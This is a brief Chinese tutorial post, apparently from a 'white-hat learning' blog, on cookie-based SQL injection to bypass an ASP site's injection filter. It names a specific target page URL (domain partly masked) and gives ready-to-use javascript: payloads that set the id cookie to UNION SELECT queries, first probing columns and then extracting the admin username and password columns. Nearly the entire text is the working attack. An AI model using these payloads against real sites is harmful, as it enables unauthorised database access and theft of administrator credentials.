cookies注入-突破注入系统

注入站点
http://www.xxxdtzx.cn/imagebig_honor.asp?id=458
方法1:
order by 语句没有禁用 ,用order by 语句测试出
访问一下网页,然后在地址栏输入下面的语句测试
javascript:alert(document.cookie=“id=”+escape(“7 and 1=2 union select 1,2,3,4,5,6,7 from admin”))

javascript:alert(document.cookie=“id=”+escape(“7 and 1=2 union select 1,admin,pwd,4,5,6,7 from admin”))

你可能感兴趣的:(白帽学习)